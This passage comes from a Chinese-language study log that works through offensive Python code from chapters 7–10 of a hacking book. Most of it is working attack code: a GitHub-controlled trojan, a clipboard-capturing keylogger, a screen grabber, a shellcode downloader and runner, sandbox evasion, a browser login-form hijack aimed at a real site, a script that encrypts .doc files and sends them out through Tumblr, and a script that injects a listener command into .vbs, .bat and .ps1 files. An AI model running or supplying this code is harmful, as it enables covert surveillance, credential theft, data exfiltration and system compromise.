  20. gh = login(username="你的账号", password="你的密码")
  21. repo = gh.repository("你的账号,同上面的账号", "python-hacker-code(仓库名)")
  22. branch = repo.branch("master")
  23. return gh,repo,branch
  24. # 从远程仓库中获取文件
  25. def get_file_contents(filepath):
  26. gh, repo, branch = connect_to_github()
  27. tree = branch.commit.commit.tree.recurse()
  28. for filename in tree.tree:
  29. if filepath in filename.path:
  30. print "[*] Found file %s" % filepath
  31. blob = repo.blob(filename._json_data['sha'])
  32. return blob.content
  33. return None
  34. # 获取木马的配置文件,并导入模块
  35. def get_trojan_config():
  36. global configured
  37. config_json = get_file_contents(trojan_config)
  38. config = json.loads(base64.b64decode(config_json))
  39. configured = True
  40. for task in config:
  41. if task['module'] not in sys.modules:
  42. exec("import %s" % task['module'])
  43. return config
  44. # 将从目标主机收集到的数据推送到仓库中
  45. def store_module_result(data):
  46. gh, repo, branch = connect_to_github()
  47. remote_path = "chapter7/data/%s/%d.data" % (trojan_id, random.randint(10,10000000))
  48. repo.create_file(remote_path,"Commit message",base64.b64encode(data))
  49. return
  50. def module_runner(module):
  51. # 将1加入到队列中
  52. task_queue.put(1)
  53. result = sys.modules[module].run(a=1,b=2,c=3)
  54. # 从队列中移除
  55. task_queue.get()
  56. # 保存结果到我们的仓库中
  57. store_module_result(result)
  58. return
  59. class GitImporter(object):
  60. def __init__(self):
  61. self.current_module_code = ""
  62. # 尝试获取模块所在位置
  63. def find_module(self, fullname, path=None):
  64. if configured:
  65. print "[*] Attempting to retrieve %s" % fullname
  66. new_library = get_file_contents("chapter7/modules/%s" % fullname)
  67. if new_library is not None:
  68. self.current_module_code = base64.b64decode(new_library)
  69. # 返回self变量,告诉python解析器找到了所需的模块
  70. return self
  71. return None
  72. # 完成模块的实际加载过程
  73. def load_module(self, name):
  74. # 创建一个空的模块对象
  75. module = imp.new_module(name)
  76. # 将github中获得的代码导入的这个对象中
  77. exec self.current_module_code in module.__dict__
  78. # 最后将这个新建的模块添加到sys.modules列表里面
  79. sys.modules[name] = module
  80. return module
  81. # 添加自定义的模块导入器
  82. sys.meta_path = [GitImporter()]
  83. # 木马循环
  84. while True:
  85. if task_queue.empty():
  86. # 获取木马配置文件
  87. config = get_trojan_config()
  88. for task in config:
  89. # 对每个模块单独建立线程
  90. t = threading.Thread(target=module_runner, args=(task['module'],))
  91. t.start()
  92. time.sleep(random.randint(1,10))
  93. time.sleep(random.randint(1000,10000))

 

运行结果:

 

运行两次后有四个data文件了

 

我们验证一下确实是获取了环境变量

 

第八章 Windows下木马的常用功能

有趣的键盘记录

利用第三方库pyHook,它利用了原生的Windows函数SetWindowsHookEx,这个在C++黑客编程很常用了,推荐本书《C++黑客编程与揭秘》

下载地址:

https://sourceforge.net/projects/pyhook/

 

因为是利用了原生的Windows API,所以是在windows平台,这个实验只能在win平台

 

原来除了安装pyHook,还有安装pythoncom,地址:下载点这里

 

安装pyHook时,出现了这个问题:Python version 2.7 required, which was not found in the registry

 

但解决了这个还不行,原来只能支持32位python,苦逼的64位委屈,最后还是安装了个32位的

 

成功后截图:

 

代码:

  1. #-*- coding:utf8 -*-
  2. from ctypes import *
  3. import pythoncom
  4. import pyHook
  5. import win32clipboard
  6. user32 = windll.user32
  7. kernel32 = windll.kernel32
  8. psapi = windll.psapi
  9. current_window = None
  10. def get_current_process():
  11. # 获取前台窗口句柄
  12. hwnd = user32.GetForegroundWindow()
  13. # 获得进程ID
  14. pid = c_ulong(0)
  15. user32.GetWindowThreadProcessId(hwnd, byref(pid))
  16. # 保存当前进程ID
  17. process_id = "%d" % pid.value
  18. # 申请内存
  19. executable = create_string_buffer("\x00" * 512)
  20. # 打开进程
  21. h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
  22. # 获取进程所对应的可执行文件的名字
  23. psapi.GetModuleBaseNameA(h_process, None, byref(executable),512)
  24. # 读取窗口标题
  25. window_title = create_string_buffer("\x00" * 512)
  26. length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
  27. # 输出进程相关信息
  28. print
  29. print "[ PID: %s - %s - %s]" % (process_id, executable.value, window_title.value)
  30. print
  31. # 关闭句柄
  32. kernel32.CloseHandle(hwnd)
  33. kernel32.CloseHandle(h_process)
  34. def keyStore(event):
  35. global current_window
  36. # 检查目标是否切换了窗口
  37. if event.WindowName != current_window:
  38. current_window = event.WindowName
  39. get_current_process()
  40. # 检测按键是否为常规按键(非组合键等)
  41. if event.Ascii > 32 and event.Ascii < 127:
  42. print chr(event.Ascii),
  43. else:
  44. # 若输入为[CTRL-V],则获取剪切板内容
  45. if event.Key == "V":
  46. win32clipboard.OpenClipboard()
  47. pasted_value = win32clipboard.GetClipboardData()
  48. win32clipboard.CloseClipboard()
  49. print "[PASTE] - %s" % (pasted_value),
  50. else:
  51. print "[%s]" % event.Key,
  52. # 返回直到下一个钩子事件被触发
  53. return True
  54. # 创建和注册钩子函数管理器
  55. k1 =pyHook.HookManager()
  56. #
  57. k1.KeyDown = keyStore
  58. # 注册键盘记录的钩子,然后永久执行
  59. k1.HookKeyboard()
  60. pythoncom.PumpMessages()

 

运行结果;(根据代码,那个耀应该就是内存的值)

【请忽略下面的英文语法,或许我不说你不知道安静

 

 

下面测试粘贴的记录效果

 

截取屏幕快照

代码:

  1. #-*- coding:utf8 -*-
  2. import win32gui
  3. import win32ui
  4. import win32con
  5. import win32api
  6. # 获取窗口桌面的句柄
  7. hdesktop = win32gui.GetDesktopWindow()
  8. # 获得显示屏的像素尺寸
  9. width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
  10. height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
  11. left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
  12. top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
  13. # 创建设备描述表
  14. desktop_dc = win32gui.GetWindowDC(hdesktop)
  15. img_dc = win32ui.CreateDCFromHandle(desktop_dc)
  16. # 创建基于内存的设备描述表,用于储存我们捕获到的图片的数据,直到我们保存到文件
  17. mem_dc = img_dc.CreateCompatibleDC()
  18. # 创建位图对象
  19. screenshot = win32ui.CreateBitmap()
  20. screenshot.CreateCompatibleBitmap(img_dc, width, height)
  21. mem_dc.SelectObject(screenshot)
  22. # 复制屏幕到我们的内存设备描述表中
  23. mem_dc.BitBlt((0,0), (width,height), img_dc, (left, top), win32con.SRCCOPY)
  24. # 将位图保存到文件中
  25. screenshot.SaveBitmapFile(mem_dc, "C:\\test.bmp")
  26. # 释放对象
  27. mem_dc.DeleteDC()
  28. win32gui.DeleteObject(screenshot.GetHandle())


运行结果:

 

Python方式的shellcode执行

代码

  1. #-*- coding:utf8 -*-
  2. import urllib2
  3. import ctypes
  4. import base64
  5. # 从我们搭建的服务器下下载shellcode
  6. url = "http://10.10.10.128:8000/shellcode.bin"
  7. response = urllib2.urlopen(url)
  8. # 解码shellcode
  9. shellcode = base64.b64decode(response.read())
  10. # 申请内存空间
  11. shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))
  12. # 创建shellcode的函数指针
  13. shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))
  14. # 执行shellcode
  15. shellcode_func()

 

报了个非法访问内存

 

这里的简单的HTTP服务器也记录了访问的记录

 

如果直接双击shellcode是可以的

 

沙盒检测

复制一下维基百科的:

  1. 在计算机安全领域,沙盒(英语:sandbox,又译为沙箱)是一种安全机制,为运行中的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。
  2. 沙盒通常严格控制其中的程序所能访问的资源,比如,沙盒可以提供用后即回收的磁盘及内存空间。在沙盒中,网络访问、对真实系统的访问、对输入设备的读取通常被禁止或是严格限制。从这个角度来说,沙盒属于虚拟化的一种。
  3. 沙盒中的所有改动对操作系统不会造成任何损失。通常,这种技术被计算机技术人员广泛用于测试可能带毒的程序或是其他的恶意代码。

 

原理:正常的机器,会在某个时间段频繁地跟机器进行交换,沙盒通常没有用户交互,没有夸张的交互数据,因为沙盒通常被用于自动对而已软件进行分析

 

  1. #-*- coding:utf8 -*-
  2. import ctypes
  3. import random
  4. import time
  5. import sys
  6. user32 = ctypes.windll.user32
  7. kernel32 = ctypes.windll.kernel32
  8. # 用于记录鼠标单击,键盘按键和双击的总数量
  9. keystrokes = 0
  10. mouse_clicks = 0
  11. double_clicks = 0
  12. # 定义LASTINPUTINFO结构体
  13. class LASTINPUTINFO(ctypes.Structure):
  14. _fields_ = [
  15. ("cbsize", ctypes.c_uint), # 结构体大小
  16. ("dwTime", ctypes.c_ulong) # 系统最后输入时间
  17. ]
  18. def get_last_input():
  19. struct_lastinputinfo = LASTINPUTINFO()
  20. struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)
  21. # 获得用户最后输入的相关信息
  22. user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))
  23. # 获取系统开机以来的时间
  24. run_time = kernel32.GetTickCount()
  25. elapsed = run_time - struct_lastinputinfo.dwTime
  26. print "[*] It's been %d milliseconds since the last input event." % elapsed
  27. return elapsed
  28. # 测试后删除下面代码,这只是测试上面代码能否运行成功
  29. # while True:
  30. # get_last_input()
  31. # time.sleep(1)
  32. def get_key_press():
  33. global mouse_clicks
  34. global keystrokes
  35. for i in range(0,0xff):
  36. # 检测某个按键是否被按下
  37. if user32.GetAsyncKeyState(i) == -32767:
  38. # 左键点击为0x1
  39. if i == 0x1:
  40. # 鼠标单击的数目和时间
  41. mouse_clicks += 1
  42. return time.time()
  43. # 键盘ASCII按键是从23-127(具体可看ASCII表),为可打印字符,这就获取了键盘的敲击次数
  44. elif i > 32 and i < 127:
  45. keystrokes += 1
  46. return None
  47. def detect_sandbox():
  48. global mouse_clicks
  49. global keystrokes
  50. # 定义键盘,单击,双击的最大值(阀值)
  51. max_keystrokes = random.randint(10,25)
  52. max_mouse_clicks = random.randint(5,25)
  53. max_double_clicks = 10
  54. double_clicks = 0
  55. double_click_threshold = 0.250 #秒为单位
  56. first_double_click = None
  57. average_mousetime = 0
  58. max_input_threshold = 30000 #毫秒为单位
  59. previous_timestamp = None
  60. detection_complete = False
  61. # 获取用户最后一次输入之后经历的时间
  62. last_input = get_last_input()
  63. # 超过设定的阀值时强制退出,就是用户最后一次输入之后经历的时间太长,都没用户活动了
  64. if last_input >= max_input_threshold:
  65. sys.exit(0)
  66. # 循环检测
  67. while not detection_complete:
  68. # 获取按下鼠标的时间,不懂的看函数的返回值
  69. keypress_time = get_key_press()
  70. if keypress_time is not None and previous_timestamp is not None:
  71. # 计算两次点击的相隔时间
  72. elapsed = keypress_time - previous_timestamp
  73. # 间隔时间短的话,则为用户双击
  74. if elapsed <= double_click_threshold:
  75. double_clicks += 1
  76. if first_double_click is None:
  77. # 获取第一次双击的时间
  78. first_double_click = time.time()
  79. else:
  80. # 是否是沙盒的管理者在沙盒中模仿用户的点击(因为普通用户通常不会双击这么多)
  81. if double_clicks == max_double_clicks:
  82. # 短时间内,鼠标点击达到了我们设定的最大值(最大次数*双击间隔)
  83. if keypress_time - first_double_click <= (max_double_clicks * double_click_threshold):
  84. sys.exit(0)
  85. # 是否达到了我们检测的最大数量,是就退出
  86. if keystrokes >= max_keystrokes and double_clicks >= max_double_clicks and mouse_clicks >=max_mouse_clicks:
  87. return
  88. previous_timestamp = keypress_time
  89. elif keypress_time is not None:
  90. previous_timestamp = keypress_time
  91. detect_sandbox()
  92. print "We are Ok!"

 

第九章 玩转浏览器

 

基于浏览器的中间人攻击

没实验出来,大概知道是什么原理:

 

首先要循环运行,判断是否是我们的目标域名,

若已经获取登陆凭证的就结束本次循环,重头开始(while的下一行代码)判断,否则继续向下

若有设置退出登陆的url,就访问,否则找退出登陆的表单,退出

接着登待浏览器回到登陆的表单页面

跟着就修改登陆表单的action,即提交地址为我们接受数据的服务器的地址,还有原登录地址也提交过去,

并将owned设置为True,代表已经获取登陆凭证

 

服务器这边,初始化监听地址和端口,并调用一个类来处理请求,其实就是处理POST请求,

首先获取包长度,读取这么多长度的内容并打印出来,登录凭证就出来了,

跟着获取用户访问的原始站点,进行301重定向,并设置头部

 

代码:

  1. #-*- coding:utf8 -*-
  2. import win32com.client
  3. import time
  4. import urlparse
  5. import urllib
  6. # 接受窃取的数据的服务器
  7. data_receiver = "http://127.0.0.1:8080/"
  8. # 目标站点
  9. target_sites = {}
  10. target_sites["www.163.com"] = {
  11. "logout_url" : "http://reg.163.com/Logout.jsp?username=zhuhaijnujixie&url=http://www.163.com/",
  12. "logout_form" : None,
  13. "logout_form_index":0,
  14. "owned" :False
  15. }
  16. target_sites["reg.163.com"] = {
  17. "logout_url" : "http://reg.163.com/Logout.jsp?username=zhuhaijnujixie&url=http://www.163.com/",
  18. "logout_form" : None,
  19. "logout_form_index":0,
  20. "owned" :False
  21. }
  22. # IE浏览器类的ID号
  23. clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
  24. # COM对象实例化,就是上面那个
  25. windows = win32com.client.Dispatch(clsid)
  26. def wait_for_browser(browser):
  27. # 等待浏览器加载完一个页面
  28. while browser.ReadyState != 4 and browser.ReadyState != "complete":
  29. time.sleep(0.1)
  30. return
  31. while True:
  32. for browser in windows:
  33. url = urlparse.urlparse(browser.LocationUrl)
  34. if url.hostname in target_sites:
  35. #print "i am in"
  36. if target_sites[url.hostname]["owned"]:
  37. continue
  38. # 如果有一个URL,我们可以重定向
  39. if target_sites[url.hostname]["logout_url"]:
  40. browser.Navigate(target_sites[url.hostname]["logout_url"])
  41. wait_for_browser(browser)
  42. else:
  43. # 检索文件中的所有元素
  44. full_doc = browser.Document.all
  45. # 迭代寻找注销表单
  46. for i in full_doc:
  47. try:
  48. # 找到退出登陆的表单并提交
  49. if i.id == target_sites[url.hostname]["logout_form"]:
  50. i.submit()
  51. wait_for_browser(browser)
  52. except:
  53. pass
  54. # 现在来修改登陆表单
  55. try:
  56. login_index = target_sites[url.hostname]["login_form_index"]
  57. login_page = urllib.quote(browser.LocationUrl)
  58. browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
  59. target_sites[url.hostname]["owned"] = True
  60. except:
  61. pass
  62. time.sleep(5)
  1. <pre name="code" class="python">#-*- coding:utf8 -*-
  2. import SimpleHTTPServer
  3. import SocketServer
  4. import urllib
  5. class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
  6. # 处理POST请求
  7. def do_POST(self):
  8. # 获取包长度
  9. content_length = int(self.headers['Content-Length'])
  10. # 读取这么多长度的内容并打印出来,登录凭证就出来了
  11. creds = self.rfile.read(content_length).decode('utf-8')
  12. print creds
  13. # 跟着获取用户访问的原始站点,进行301重定向,并设置头部
  14. site = self.path[1:]
  15. self.send_response(301)
  16. self.send_header("Location",urllib.unquote(site))
  17. self.end_headers()
  18. # 初始化监听地址和端口,并调用一个类来处理请求,其实就是处理POST请求
  19. server = SocketServer.TCPServer(('0.0.0.0', 8080), CredRequestHandler)
  20. # 永远监听
  21. server.serve_forever()
 

利用IE的COM组件自动化技术窃取数据

安装pycrypto

可以直接下源码:https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz

,也可以pip

出了点问题

下载Microsoft Visual C++ Compiler for Python 2.7 安装即可(这个就是9.0的)

https://www.microsoft.com/en-us/download/confirmation.aspx?id=44266

先是生成公钥和私钥来加密解密我们的数据

下面有个函数

generate(bitsrandfunc=Noneprogress_func=Nonee=65537)

 

Randomly generate a fresh, new RSA key object.

随机地生成一个新的RSA key对象

Parameters:

  • bits (int) - Key length, or size (in bits) of the RSA modulus. It must be a multiple of 256, and no smaller than 1024.(key长度,不少于1024,且为256的倍数)
  • randfunc (callable) - Random number generation function; it should accept a single integer N and return a string of random data N bytes long. If not specified, a new one will be instantiated from Crypto.Random.(随机数生成函数,默认使用 Crypto.Random)
  • progress_func (callable) - Optional function that will be called with a short string containing the key parameter currently being generated; it's useful for interactive applications where a user is waiting for a key to be generated.
  • e (int) - Public RSA exponent. It must be an odd positive integer. It is typically a small number with very few ones in its binary representation. The default value 65537 (= 0b10000000000000001 ) is a safe choice: other common values are 5, 7, 17, and 257.(必须为奇正整数,默认65537)

Returns:

An RSA key object (_RSAobj).

Raises:

  • ValueError - When bits is too little or not a multiple of 256, or when e is not odd or smaller than 2.
Attention:
  • You should always use a cryptographically secure random number generator, such as the one defined in the Crypto.Random module; don't just use the current time and the random module.
  • Exponent 3 is also widely used, but it requires very special care when padding the message.

代码:

  1. #-*- coding:utf8 -*-
  2. from Crypto.PublicKey import RSA
  3. # 随机地生成一个新的RSA key对象
  4. new_key = RSA.generate(2048, e = 65537)
  5. # 导出公钥和私钥
  6. public_key = new_key.publickey().exportKey("PEM")
  7. private_key = new_key.exportKey("PEM")
  8. # 分别输出公钥和私钥
  9. print public_key
  10. print private_key


ie_exfil.py代码:

  1. #-*- coding:utf8 -*-
  2. import win32com.client
  3. import os
  4. import fnmatch
  5. import time
  6. import random
  7. import zlib
  8. from Crypto.PublicKey import RSA
  9. from Crypto.Cipher import PKCS1_OAEP
  10. # 要窃取的文档类型和tumblr的账号密码
  11. doc_type = ".doc"
  12. username = "你的账号"
  13. password = "你的密码"
  14. public_key = "你生成的公钥"
  15. def wait_for_browser(browser):
  16. # 等待浏览器加载完一个页面
  17. while browser.ReadyState != 4 and browser.ReadyState != "complete":
  18. time.sleep(0.1)
  19. return
  20. def encrypt_string(plaintext):
  21. # 设置块大小
  22. chunk_size = 256
  23. print "Compressing: %d bytes" % len(plaintext)
  24. # 首先调用zlib进行压缩
  25. plaintext = zlib.compress(plaintext)
  26. print "Encrypting %d bytes" % len(plaintext)
  27. # 利用公钥建立RSA公钥加密对象
  28. rsakey = RSA.importKey(public_key)
  29. rsakey = PKCS1_OAEP.new(rsakey)
  30. encrypted = ""
  31. offset = 0
  32. # 对文件内容进行每256个字节为一块循环加密
  33. while offset < len(plaintext):
  34. # 获取某个256字节
  35. chunk = plaintext[offset:offset+chunk_size]
  36. # 若到最后不够256字节,则用空格补够
  37. if len(chunk) % chunk_size != 0:
  38. chunk += " " * (chunk_size - len(chunk))
  39. # 将已加密的连起来
  40. encrypted += rsakey.encrypt(chunk)
  41. # 偏移增加
  42. offset += chunk_size
  43. # 对加密后的进行base64编码
  44. encrypted = encrypted.encode("base64")
  45. # 输出最后加密后的长度
  46. print "Base64 encodeed crypto: %d" % len(encrypted)
  47. # 返回加密后内容
  48. return encrypted
  49. def encrypt_post(filename):
  50. # 打开并读取文件
  51. fd = open(filename, "rb")
  52. contents = fd.read()
  53. fd.close()
  54. # 分别加密文件名和内容
  55. encrypt_title = encrypt_string(filename)
  56. encrypt_body = encrypt_string(contents)
  57. return encrypt_title, encrypt_body
  58. # 随机休眠一段时间
  59. def random_sleep():
  60. time.sleep(random.randint(5,10))
  61. return
  62. def login_to_tumblr(ie):
  63. # 解析文档中的所有元素
  64. full_doc = ie.Document.all
  65. # 迭代每个元素来查找登陆表单
  66. for i in full_doc:
  67. if i.id == "signup_email":
  68. i.setAttribute("value", username)
  69. elif i.id == "signup_password":
  70. i.setAttribute("value", password)
  71. random_sleep()
  72. try:
  73. # 你会遇到不同的登陆主页
  74. if ie.Document.forms[0].id == "signup_form":
  75. ie.Document.forms[0].submit()
  76. else:
  77. ie.Document.forms[1].submit()
  78. except IndexError, e:
  79. pass
  80. random_sleep()
  81. # 登陆表单是登陆页面的第二个表单
  82. wait_for_browser(ie)
  83. return
  84. def post_to_tumblr(ie, title, post):
  85. full_doc = ie.Document.all
  86. for i in full_doc:
  87. if i.id == "post_one":
  88. i.setAttribute("value", title)
  89. title_box = i
  90. elif i.id == "post_two":
  91. i.setAttribute("innerHTML", post)
  92. elif i.id == "create_post":
  93. print "Found post button"
  94. post_form = i
  95. i.focus()
  96. random_sleep()
  97. title_box.focus()
  98. random_sleep()
  99. post_form.childran[0].click()
  100. wait_for_browser(ie)
  101. random_sleep()
  102. return
  103. def exfiltrate(document_path):
  104. # 创建IE实例化对象
  105. ie = win32com.client.Dispatch("InternetExplorer.Application")
  106. # 调试阶段设置为1,实际设置为0,以增加隐蔽性
  107. ie.Visible = 1
  108. # 访问tumblr站点并登陆
  109. ie.Navigate("http://www.tumblr.com/login")
  110. wait_for_browser(ie)
  111. print "Logging in ..."
  112. login_to_tumblr(ie)
  113. print "Logged in ... navigating"
  114. ie.Navigate("https://www.tumblr.com/new/text")
  115. wait_for_browser(ie)
  116. # 加密文件
  117. title,body = encrypt_post(document_path)
  118. print "Creating new post..."
  119. post_to_tumblr(ie, title, body)
  120. print "Posted!"
  121. # 销毁IE实例
  122. ie.Quit()
  123. ie = None
  124. # 用户文档检索的主循环,路径自定
  125. for parent, directories, filenames in os.walk("C:\\"):
  126. for filename in fnmatch.filter(filenames, "*%s" % doc_type):
  127. document_path = os.path.join(parent, filename)
  128. print "Found: %s" % document_path
  129. exfiltrate(document_path)
  130. raw_input("Continue?")


我们获取后如何解密呢

decryptor.py:

  1. #-*- coding:utf8 -*-
  2. import zlib
  3. import base64
  4. from Crypto.PublicKey import RSA
  5. from Crypto.Cipher import PKCS1_OAEP
  6. private_key = "你生成的私钥"
  7. rsakey = RSA.importKey(private_key)
  8. rsakey = PKCS1_OAEP.new(rsakey)
  9. <pre name="code" class="python">encrypted = "复制加密的内容过来"

chunk_size = 256offset = 0decrypted = ""encrypted = base64.b64decode(encrypted)while offset < len(encrypted): decrypted += rsakey.decrypt(encrypted[offset:offset+chunk_size]) offset += chunk_size# 解压负载plaintext = zlib.decompress(decrypted)print plaintext

 

实验还是没成功:

第十章 Windows系统提权

这章主要是监控具有高权限的进程,插入代码,从而获取熊权限

环境准备

安装pywin32,键盘钩子那章已经安装

安装wmi: easy_install wmi

示例服务下载:

https://www.nostarch.com/download/bhpservice.zip

利用WMI监视进程

  1. #-*- coding:utf8 -*-
  2. """
  3. @version:
  4. @author: giantbranch
  5. @file: process_monitor.py
  6. @time: 2016/3/13 20:12
  7. """
  8. import win32con
  9. import win32api
  10. import win32security
  11. import wmi
  12. import sys
  13. import os
  14. # 保存数据到文件中
  15. def log_to_file(message):
  16. fd = open("process_monitor_log.csv", "ab")
  17. fd.write("%s\r\n" % message)
  18. fd.close()
  19. return
  20. # 创建一个日志文件的头
  21. log_to_file("Time,User,Executable,CommandLine,PID,Parent PID,Privileges")
  22. # 初始化WMI接口
  23. c = wmi.WMI()
  24. # 创建进程监控器(监控进程创建)
  25. process_watcher = c.Win32_Process.watch_for("creation")
  26. while True:
  27. try:
  28. # 有创建进程事件会返回
  29. new_process = process_watcher()
  30. proc_owner = new_process.GetOwner()
  31. # for i in proc_owner:
  32. # print i
  33. proc_owner = "%s\\%s" % (proc_owner[0], proc_owner[2])
  34. # 时间
  35. create_data = new_process.CreationDate
  36. # 路径
  37. executable = new_process.ExecutablePath
  38. # 命令行(就是实际的命令是什么)
  39. cmdline = new_process.CommandLine
  40. pid = new_process.ProcessId
  41. parent_pid = new_process.ParentProcessId
  42. # N/A:不可用的意思
  43. privileges = "N/A"
  44. process_log_message = "%s,%s,%s,%s,%s,%s,%s\r\n" % (create_data, proc_owner, executable, cmdline, pid, parent_pid, privileges)
  45. # print process_log_message
  46. log_to_file(process_log_message)
  47. except:
  48. pass

 


实验结果:

 

我们看一下owner的输出

 

 

Windows系统的令牌权限

msdn访问令牌:https://msdn.microsoft.com/zh-cn/library/Aa374909.aspx

权限列表:https://msdn.microsoft.com/zh-cn/library/windows/desktop/bb530716(v=vs.85).aspx

 

在上面加入以下代码,放到log_to_file函数前面吧

同时 privileges = get_process_privileges(pid)
  1. def get_process_privileges(pid):
  2. try:
  3. # 通过pid获取目标进程句柄
  4. hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_INFORMATION, False, pid)
  5. # 打开主进程的令牌
  6. htok = win32security.OpenProcessToken(hproc, win32con.TOKEN_QUERY)
  7. # 解析已启用的权限列表,获得令牌信息
  8. privs = win32security.GetTokenInformation(htok, win32security.TokenPrivileges)
  9. # 迭代每个权限并输出其中已经启用的
  10. # i[0]:具体权限
  11. # i[1]:该权限是否启用
  12. priv_list = ""
  13. for i in privs:
  14. # 检测权限是否已经启用
  15. if i[1] == 3:
  16. # 获取并连接权限的名称
  17. priv_list += "%s|" % win32security.LookupPrivilegeName(None, i[0])
  18. except:
  19. priv_list = "N/A"
  20. return priv_list


结果:

 

赢得竞争

  1. # 作者提供的原示例文件
  2. # http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
代码:
 
#-*- coding:utf8 -*- """ @version: @author: giantbranch @file: file_monitor.py @time: 2016/3/14 23:36 """ import tempfile import threading import win32file import win32con import os # 这些是典型的临时文件所在路径,就是我们监控的目录 dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()] # 文件修改行为对应常量 FILE_CREATE = 1 FILE_DELETE = 2 FILE_MODIFIED = 3 FILE_RENAMED_FROM = 4 FILE_RENAMED_TO = 5 def start_monitor(path_to_watch): # 为每个监控器起一个线程 FILE_LIST_DIRECTORY = 0x0001 # 获取文件目录句柄 h_directory = win32file.CreateFile( path_to_watch, FILE_LIST_DIRECTORY, win32con.FILE_SHARE_READ |win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE, None, win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS, None ) while 1: try: # 这函数会在目录结构改变时通知我们 results = win32file.ReadDirectoryChangesW( h_directory, 1024, True, win32con.FILE_NOTIFY_CHANGE_FILE_NAME | win32con.FILE_NOTIFY_CHANGE_DIR_NAME | win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES | win32con.FILE_NOTIFY_CHANGE_SIZE | win32con.FILE_NOTIFY_CHANGE_LAST_WRITE | win32con.FILE_NOTIFY_CHANGE_SECURITY, None, None ) # 我们可以获得发送了何种改变,以及目标文件的名称 for action,file_name in results: full_filename = os.path.join(path_to_watch, file_name) if action == FILE_CREATE: print "[ + ] Created %s" % full_filename elif action == FILE_DELETE: print "[ - ] Deleted %s" % full_filename elif action == FILE_MODIFIED: print "[ * ] Modified %s" % full_filename # 输出文件内容 print "[vvv] Dumping contents..." try: # 打开文件读数据 fd = open(full_filename, "rb") contents = fd.read() fd.close() print contents print "[^^^] Dump complete." except: print "[!!!] Failed." # 重命名哪个文件 elif action == FILE_RENAMED_FROM: print "[ > ] Renamed from: %s" % full_filename # 重命名后的文件名是? elif action == FILE_RENAMED_TO: print "[ < ] Renamed to: %s" % full_filename else: print "[???] Unknown: %s" % full_filename except: pass for path in dirs_to_monitor: monitor_thread = threading.Thread(target=start_monitor,args=(path,)) print "Spawning monitoring thread for path: %s" % path monitor_thread.start()

 

实验结果:

 

代码插入

  1. #-*- coding:utf8 -*-
  2. """
  3. @version:
  4. @author: giantbranch
  5. @file: file_monitor.py
  6. @time: 2016/3/14 23:36
  7. """
  8. import tempfile
  9. import threading
  10. import win32file
  11. import win32con
  12. import os
  13. # 这些是典型的临时文件所在路径,就是我们监控的目录
  14. dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
  15. # 文件修改行为对应常量
  16. FILE_CREATE = 1
  17. FILE_DELETE = 2
  18. FILE_MODIFIED = 3
  19. FILE_RENAMED_FROM = 4
  20. FILE_RENAMED_TO = 5
  21. # 定义匹配特定文件扩展名的字典
  22. file_types = {}
  23. command = "C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c"
  24. # 每段扩展名对应一个特定的标签及我们想要插入的一段脚本
  25. file_types['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
  26. file_types['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
  27. file_types['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"" % command]
  28. # 用于执行代码插入的函数
  29. def inject_code(full_filename, extension, contents):
  30. # 判断文件是否存在标记
  31. if file_types[extension][0] in contents:
  32. return
  33. # 如果没有标记的话,那么插入代码并标记
  34. full_contents = file_types[extension][0]
  35. full_contents += file_types[extension][1]
  36. full_contents += contents
  37. fd = open(full_filename, "wb")
  38. fd.write(full_contents)
  39. fd.close()
  40. print "[\o/] Injected code"
  41. return
  42. # 为每个监控器起一个线程
  43. def start_monitor(path_to_watch):
  44. # 访问模式
  45. FILE_LIST_DIRECTORY = 0x0001
  46. # 获取文件目录句柄
  47. h_directory = win32file.CreateFile(
  48. path_to_watch,
  49. FILE_LIST_DIRECTORY,
  50. win32con.FILE_SHARE_READ |win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
  51. None,
  52. win32con.OPEN_EXISTING,
  53. win32con.FILE_FLAG_BACKUP_SEMANTICS,
  54. None
  55. )
  56. while 1:
  57. try:
  58. # 这函数会在目录结构改变时通知我们
  59. results = win32file.ReadDirectoryChangesW(
  60. h_directory,
  61. 1024,
  62. True,
  63. win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
  64. win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
  65. win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
  66. win32con.FILE_NOTIFY_CHANGE_SIZE |
  67. win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
  68. win32con.FILE_NOTIFY_CHANGE_SECURITY,
  69. None,
  70. None
  71. )
  72. # 我们可以获得发送了何种改变,以及目标文件的名称
  73. for action,file_name in results:
  74. full_filename = os.path.join(path_to_watch, file_name)
  75. if action == FILE_CREATE:
  76. print "[ + ] Created %s" % full_filename
  77. elif action == FILE_DELETE:
  78. print "[ - ] Deleted %s" % full_filename
  79. elif action == FILE_MODIFIED:
  80. print "[ * ] Modified %s" % full_filename
  81. # 输出文件内容
